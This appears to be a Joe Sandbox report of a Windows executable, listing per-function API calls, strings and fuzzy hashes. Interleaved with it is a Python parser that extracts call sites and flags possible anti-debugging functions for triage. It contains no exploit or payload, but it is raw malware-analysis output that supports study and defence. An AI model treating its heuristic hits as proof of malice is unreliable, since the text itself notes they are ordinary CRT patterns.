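• API String ID: 3906539128-0
• Instruction Fuzzy Hash: 8631D274911229ABCB21DF64D9887DCBBB8BF08310F5041EAE81CA7261EB709FD18F45
APIs
• GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0025FD6A
• GetNumberFormatW.KERNEL32(00000400,00000000,?,00289714,?,?), ref: 0025FDB3
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
Similarity
• API ID: FormatInfoLocaleNumber
• String ID:
• Instruction Fuzzy Hash: D7118E79221348ABDB01DF70EC49BAAB7F8EF08710F00446AB905A7191D270A999CB64
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,002786CD,?,?,00000008,?,?,0027836D,00000000), ref: 002788FF
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
Similarity
• API ID: ExceptionRaise
• Instruction Fuzzy Hash: 1EB17A35620609DFD718CF28C48AB647BE0FF45364F29C658E99ACF2A1C735D9A2CB41
APIs
• GetVersionExW.KERNEL32(?), ref: 002503ED
  • Part of subcall function 00250469: __EH_prolog3.LIBCMT ref: 00250470
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
Similarity
• API ID: H_prolog3Version
• Instruction Fuzzy Hash: 57F0A47482524D8EEF24EF70BC897EC7BA45B1630AF044468DE063B252D7B4449D9F15
"""

@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple                     # raw argument tokens as printed ("?" = not resolved)
    ref: int                        # call-site VA as printed in the report
    subcall_of: Optional[int] = None  # set when the call sits inside a callee

@dataclass
class FunctionEntry:
    fields: dict = field(default_factory=dict)   # Similarity / IDA-plugin key-value lines
    image_base: Optional[int] = None             # 'Offset:' of the source dump
    apis: list = field(default_factory=list)

    @property
    def api_id(self) -> str:
        return self.fields.get("API ID", "")

    def rva(self, va: int) -> Optional[int]:
        """Relative virtual address of a printed VA, for use in a disassembler."""
        return va - self.image_base if self.image_base is not None else None

API_RE = re.compile(
    r"^•\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
    r"([\w@$?]+)\.(\w+)(?:\((.*?)\))?,?\s*ref:\s*([0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
SECTIONS = {"Strings", "APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

def parse_entries(text: str) -> list:
    """Split the report text into FunctionEntry records; an entry ends at its
    'Instruction Fuzzy Hash' line, the last field Joe Sandbox prints per function."""
    entries, cur, section = [], FunctionEntry(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            sub, name, mod, args, ref = m.groups()
            cur.apis.append(ApiCall(name, mod, tuple(args.split(",")) if args else (),
                                    int(ref, 16), int(sub, 16) if sub else None))
            continue
        m = KV_RE.match(line)
        if not m:
            continue
        key, val = m.group(1).strip(), m.group(2).strip()
        if key == "Source File":
            base = re.search(r"Offset:\s*([0-9A-Fa-f]+)", val)
            cur.image_base = int(base.group(1), 16) if base else None
        elif key != "Associated":
            cur.fields[key] = val
        if key == "Instruction Fuzzy Hash":
            entries.append(cur)
            cur = FunctionEntry()
    return entries

def call_sites(entries: list) -> dict:
    """API name -> sorted RVAs of every call site seen in the entries."""
    out = {}
    for e in entries:
        for c in e.apis:
            out.setdefault(c.name, []).append(e.rva(c.ref))
    return {k: sorted(v) for k, v in out.items()}

def debugger_check_entries(entries: list) -> list:
    """Instruction Fuzzy Hashes of functions whose API ID includes IsDebuggerPresent,
    i.e. the entries to inspect for the report's debugger-check signature."""
    return [e.fields.get("Instruction Fuzzy Hash", "") for e in entries
            if "DebuggerPresent" in e.api_id]

if __name__ == "__main__":
    es = parse_entries(SAMPLE)
    for name, rvas in sorted(call_sites(es).items()):
        print(f"{name:28s} {[hex(r) for r in rvas]}")
    print("debugger-check candidates:", debugger_check_entries(es))
```

Run against the full report text, this yields one record per function and a list of RVAs to jump to in the unpacked image (for example GetLocaleInfoW at 0x1FD6A relative to the 0x240000 base). Two caveats a triager should keep in mind: the IsDebuggerPresent/UnhandledExceptionFilter pair also occurs in ordinary MSVC CRT fault-reporting code, and RaiseException with 0xC000000D (STATUS_INVALID_PARAMETER) is the CRT's invalid-parameter path, so these hits are locations to inspect rather than proof of deliberate anti-debugging on their own.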
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID:
• String ID: gj
• API String ID: 0-4203073231
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00026A20,00266445), ref: 00266A10
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
Similarity
• API ID:
• String ID:
• API String ID:
Similarity
• API ID:
• String ID:
• API String ID:
Similarity
• API ID:
• String ID:
• API String ID:
Similarity
• API ID:
• String ID:
• API String ID:
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                            • Opcode ID: c86016850603241852536d9c0f1440a8f43a1f33633afa22c2083db2793c73a8
                                                                                                                                                                            • Instruction ID: d6fe8cfa7bafc89d49f101cb5ba85285dc49716d009abbd39fb1616a7e26f743
                                                                                                                                                                            • Opcode Fuzzy Hash: c86016850603241852536d9c0f1440a8f43a1f33633afa22c2083db2793c73a8
                                                                                                                                                                            • Instruction Fuzzy Hash: 2012E6706247068FD71DCF28C8917B9B7E0FF44305F14892EE89AC7681E774A9A9CB49
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e84c5ff1ea6b153f7c2d19f52c16b3470387d2bc36faafd77cf482cc520376ce
                                                                                                                                                                            • Instruction ID: af6f7956c7df7d3bf0df8568fab3ed4a3d93d3cb16c6231a2ec7331ad570cd46
                                                                                                                                                                            • Opcode Fuzzy Hash: e84c5ff1ea6b153f7c2d19f52c16b3470387d2bc36faafd77cf482cc520376ce
                                                                                                                                                                            • Instruction Fuzzy Hash: BBE15DB45183919FC304CF29D59586ABBF0EB9D300F46096EF9D497352C234EA1ADFA2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3706335d746c9da37cd81a8ec27d4610fef566e0bb21ee417eb07c00f55a2b03
                                                                                                                                                                            • Instruction ID: 8c4b5dafd684266fec73f23e875d716d2160c5baf314044d04250406b8e3323a
                                                                                                                                                                            • Opcode Fuzzy Hash: 3706335d746c9da37cd81a8ec27d4610fef566e0bb21ee417eb07c00f55a2b03
                                                                                                                                                                            • Instruction Fuzzy Hash: F3916A313243424FDB25DE68C886BAE77D5AFD0305F140A3DED8687282D77498998B5B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0aea5887f99b6088f58a8836922ad4eca26c3eb66db8731976e507e9fe335680
                                                                                                                                                                            • Instruction ID: ff3112c894a0b5e7fd8045b7999112d5728b19c76204c64a5dd4f81607aedc0f
                                                                                                                                                                            • Opcode Fuzzy Hash: 0aea5887f99b6088f58a8836922ad4eca26c3eb66db8731976e507e9fe335680
                                                                                                                                                                            • Instruction Fuzzy Hash: 12617A7163064A57EE387EA888B17BE33949F07304F70049AECCADB282D655DDF18755
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                                                                            • Instruction ID: 85d7da6ecd8f73a64aadd4afafd5d6b76275df9d1581a197a2988cff6592756b
                                                                                                                                                                            • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                                                                            • Instruction Fuzzy Hash: B251983123078796CF36AD6888697FE23998B12300F68051AF986C7EA2C746DDF5CB55
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 35d90f93c2d8923292c448fc34c9d065ace71762b7f7b255ea10fb9c687b3923
                                                                                                                                                                            • Instruction ID: dec628c81de5e7981a41f9a219e7b8c5ae665313b37075c6c1628f548e753ca0
                                                                                                                                                                            • Opcode Fuzzy Hash: 35d90f93c2d8923292c448fc34c9d065ace71762b7f7b255ea10fb9c687b3923
                                                                                                                                                                            • Instruction Fuzzy Hash: 295123315093D64FC711EF28C4449BEFFF0AE9A31DF0A4999E8D54B142D230EA9ACB52
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 66c087c05f726911fb12e8e73f403b84da2aea948485a364c16f959b7298c5db
                                                                                                                                                                            • Instruction ID: 170ba9ddff9629814177c14f48431290aeaac1d24d56984eb033b911f0837419
                                                                                                                                                                            • Opcode Fuzzy Hash: 66c087c05f726911fb12e8e73f403b84da2aea948485a364c16f959b7298c5db
                                                                                                                                                                            • Instruction Fuzzy Hash: 8451DEB1A087119FC758CF29D48055AF7E1BF88314F058A2EF899E7740DB30E959CB9A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 05051f28e1c7025b01332903b260566e0dad3863efea20ce7ce926dc4f85ab64
                                                                                                                                                                            • Instruction ID: 4aba20a24c417d24ebfbc260908a45b83bb6ca7d9ef0e1362e76bca19fe05efe
                                                                                                                                                                            • Opcode Fuzzy Hash: 05051f28e1c7025b01332903b260566e0dad3863efea20ce7ce926dc4f85ab64
                                                                                                                                                                            • Instruction Fuzzy Hash: 083114B16247168FCB14DF28C85266EBBD0FB95301F104A2DE89AC3342C375E829CF96
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
APIs
• _swprintf.LIBCMT ref: 00253EEA
  • Part of subcall function 0024F6BA: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0024F6CD
  • Part of subcall function 002589ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,0028E088,?,00000007,002533E2,?,?,00000050,6294DA82), ref: 00258A0A
• _strlen.LIBCMT ref: 00253F0B
• SetDlgItemTextW.USER32(?,0028919C,?), ref: 00253F64
• GetWindowRect.USER32(?,?), ref: 00253F9A
• GetClientRect.USER32(?,?), ref: 00253FA6
• GetWindowLongW.USER32(?,000000F0), ref: 00254051
• GetWindowRect.USER32(?,?), ref: 00254081
• SetWindowTextW.USER32(?,?), ref: 002540B0
• GetSystemMetrics.USER32(00000008), ref: 002540B8
• GetWindow.USER32(?,00000005), ref: 002540C3
• GetWindowRect.USER32(00000000,?), ref: 002540F3
• GetWindow.USER32(00000000,00000002), ref: 00254165
Strings
Similarity
• API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
• String ID: I=uqI&$$%s:$CAPTION$d
• API String ID: 2407758923-2096536411
APIs
• InitializeCriticalSectionAndSpinCount.KERNEL32(002960E0,00000FA0,?,?,00266185), ref: 002661B3
• GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00266185), ref: 002661BE
• GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00266185), ref: 002661CF
• GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 002661E1
• GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 002661EF
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00266185), ref: 00266212
• DeleteCriticalSection.KERNEL32(002960E0,00000007,?,?,00266185), ref: 00266235
• CloseHandle.KERNEL32(00000000,?,?,00266185), ref: 00266245
Strings
• api-ms-win-core-synch-l1-2-0.dll, xrefs: 002661B9
• kernel32.dll, xrefs: 002661CA
• SleepConditionVariableCS, xrefs: 002661DB
• WakeAllConditionVariable, xrefs: 002661E7
Similarity
• API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
• String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
• API String ID: 2565136772-3242537097
APIs
• ___free_lconv_mon.LIBCMT ref: 00273816
  • Part of subcall function 002733B1: _free.LIBCMT ref: 002733CE
  • Part of subcall function 002733B1: _free.LIBCMT ref: 002733E0
  • Part of subcall function 002733B1: _free.LIBCMT ref: 002733F2
  • Part of subcall function 002733B1: _free.LIBCMT ref: 00273404
  • Part of subcall function 002733B1: _free.LIBCMT ref: 00273416
  • Part of subcall function 002733B1: _free.LIBCMT ref: 00273428
  • Part of subcall function 002733B1: _free.LIBCMT ref: 0027343A
  • Part of subcall function 002733B1: _free.LIBCMT ref: 0027344C
  • Part of subcall function 002733B1: _free.LIBCMT ref: 0027345E
  • Part of subcall function 002733B1: _free.LIBCMT ref: 00273470
  • Part of subcall function 002733B1: _free.LIBCMT ref: 00273482
  • Part of subcall function 002733B1: _free.LIBCMT ref: 00273494
  • Part of subcall function 002733B1: _free.LIBCMT ref: 002734A6
• _free.LIBCMT ref: 0027380B
  • Part of subcall function 002703D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00273546,?,00000000,?,00000000,?,0027356D,?,00000007,?,?,0027396A,?), ref: 002703EA
  • Part of subcall function 002703D4: GetLastError.KERNEL32(?,?,00273546,?,00000000,?,00000000,?,0027356D,?,00000007,?,?,0027396A,?,?), ref: 002703FC
• _free.LIBCMT ref: 0027382D
• _free.LIBCMT ref: 00273842
• _free.LIBCMT ref: 0027384D
• _free.LIBCMT ref: 0027386F
• _free.LIBCMT ref: 00273882
• _free.LIBCMT ref: 00273890
• _free.LIBCMT ref: 0027389B
• _free.LIBCMT ref: 002738D3
• _free.LIBCMT ref: 002738DA
• _free.LIBCMT ref: 002738F7
• _free.LIBCMT ref: 0027390F
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
APIs
• __EH_prolog3_GS.LIBCMT ref: 0025D919
  • Part of subcall function 002414A7: _wcslen.LIBCMT ref: 002414B8
• _wcslen.LIBCMT ref: 0025D97B
• _wcslen.LIBCMT ref: 0025D99A
• _wcslen.LIBCMT ref: 0025D9B6
• _strlen.LIBCMT ref: 0025DA14
• GlobalAlloc.KERNEL32(00000040,?,00000000,0027D9F0,00000000,?,00000000,?,<html>,00000006,<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>,?), ref: 0025DA2D
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 0025DA54
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: _wcslen$Global$AllocCreateH_prolog3_Stream_strlen
• String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
• API String ID: 1185167184-1533471033
• Opcode ID: 99f27f7beeece1d4e2d1e94d4a797726003b2a9900c1535353c709000944e23a
• Instruction ID: 7c4f86cc0a8aa2f23b68fa3f19548c79b99e8d76f9f9b3d99aedefe39c7df17d
• Opcode Fuzzy Hash: 99f27f7beeece1d4e2d1e94d4a797726003b2a9900c1535353c709000944e23a
• Instruction Fuzzy Hash: 64515371D20219DFEB14EBA0CC46BEEBBB9EF05311F140019E905BB181DB705EA9CBA5
APIs
• GetWindow.USER32(?,00000005), ref: 002637C4
• GetClassNameW.USER32(00000000,?,00000080), ref: 002637F0
  • Part of subcall function 00258DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00250E3F,?,?,?,00000046,00251ECE,00000046,?,exe,00000046), ref: 00258DBA
• GetWindowLongW.USER32(00000000,000000F0), ref: 0026380C
• SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00263823
• GetObjectW.GDI32(00000000,00000018,?), ref: 00263837
• SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00263860
• DeleteObject.GDI32(00000000), ref: 00263867
• GetWindow.USER32(00000000,00000002), ref: 00263870
Strings
Similarity
• API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
• String ID: @U=u$STATIC
• API String ID: 3820355801-590614257
• Opcode ID: 8ac744ec29ebec19d8ca7ec21cfe6d81e4d9960f8b75148121ba1511a8416372
• Instruction ID: 3fcad01204384e937ec0b6a99d2d3454ab938c4e2e2f02a911d74d8fd17ab60c
• Opcode Fuzzy Hash: 8ac744ec29ebec19d8ca7ec21cfe6d81e4d9960f8b75148121ba1511a8416372
• Instruction Fuzzy Hash: D62146721643117BE620AF34EC4EFEF729CAF45700F010026FE45A70D1DB308A554AA9
APIs
  • Part of subcall function 00241E44: GetDlgItem.USER32(00000000,00003021), ref: 00241E88
  • Part of subcall function 00241E44: SetWindowTextW.USER32(00000000,0027C6C8), ref: 00241E9E
• EndDialog.USER32(?,00000001), ref: 00260720
• SendMessageW.USER32(?,00000080,00000001,000103D3), ref: 00260747
• SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,13050D28), ref: 00260760
• GetDlgItem.USER32(?,00000065), ref: 0026077C
• SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00260790
• SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 002607A6
Strings
Similarity
• API ID: MessageSend$Item$DialogTextWindow
• String ID: @U=u$LICENSEDLG$J&
• API String ID: 3077722735-3420589309
• Opcode ID: ccc1496062da74fadc7afc812689ca0c554edcc4655a234e2a4badeecd770d35
• Instruction ID: d818ebf318edc553205194809fe3f970b51d0591a6382de2a3c103c4e866bf9b
• Opcode Fuzzy Hash: ccc1496062da74fadc7afc812689ca0c554edcc4655a234e2a4badeecd770d35
• Instruction Fuzzy Hash: 99213631375215BBD6026F21EC8CFBB7B6CEB4A745F040005F600A20D0D7A1AEA0DB35
APIs
• _free.LIBCMT ref: 0026FF25
  • Part of subcall function 002703D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00273546,?,00000000,?,00000000,?,0027356D,?,00000007,?,?,0027396A,?), ref: 002703EA
  • Part of subcall function 002703D4: GetLastError.KERNEL32(?,?,00273546,?,00000000,?,00000000,?,0027356D,?,00000007,?,?,0027396A,?,?), ref: 002703FC
• _free.LIBCMT ref: 0026FF31
• _free.LIBCMT ref: 0026FF3C
• _free.LIBCMT ref: 0026FF47
• _free.LIBCMT ref: 0026FF52
• _free.LIBCMT ref: 0026FF5D
• _free.LIBCMT ref: 0026FF68
• _free.LIBCMT ref: 0026FF73
• _free.LIBCMT ref: 0026FF7E
• _free.LIBCMT ref: 0026FF8C
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 097340638f6ec69d5e36f65ab14fb562bdb5bfc4cfccd3ec444d9bc076b29c7b
• Instruction ID: a2ff789221691e59b1152c90da45baff714eb167f870cc54525a856cc6707866
• Opcode Fuzzy Hash: 097340638f6ec69d5e36f65ab14fb562bdb5bfc4cfccd3ec444d9bc076b29c7b
• Instruction Fuzzy Hash: F811A47612414CFFDF41EF95D982CDD3BA5EF04350B1180E1BA089B262DAB1EA64DF80
APIs
Strings
Similarity
• API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
• String ID: csm$csm$csm
• API String ID: 322700389-393685449
• Opcode ID: 08388bdacba210b75191a9f284b25879895556f55dfb66530130f6709f017132
• Instruction ID: d87b44e4019437fe27b05a23b26eb3c6d20fab34543d985770f352e3f1c0a5a2
• Opcode Fuzzy Hash: 08388bdacba210b75191a9f284b25879895556f55dfb66530130f6709f017132
• Instruction Fuzzy Hash: 87B17C7582020AEFCF15EFA4D9819AEB7B9BF04314F14446AE8056B212DB31DAF1CF91
APIs
• __EH_prolog3_GS.LIBCMT ref: 0024D99A
• GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 0024D9BF
• GetLongPathNameW.KERNEL32(?,?,?), ref: 0024DA11
• GetShortPathNameW.KERNEL32(?,00000000,00000000), ref: 0024DA34
• GetShortPathNameW.KERNEL32(?,?,?), ref: 0024DA84
• MoveFileW.KERNEL32(-00000040,-00000028), ref: 0024DC9F
• MoveFileW.KERNEL32(-00000028,-00000040), ref: 0024DCEC
  • Part of subcall function 002414A7: _wcslen.LIBCMT ref: 002414B8
Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
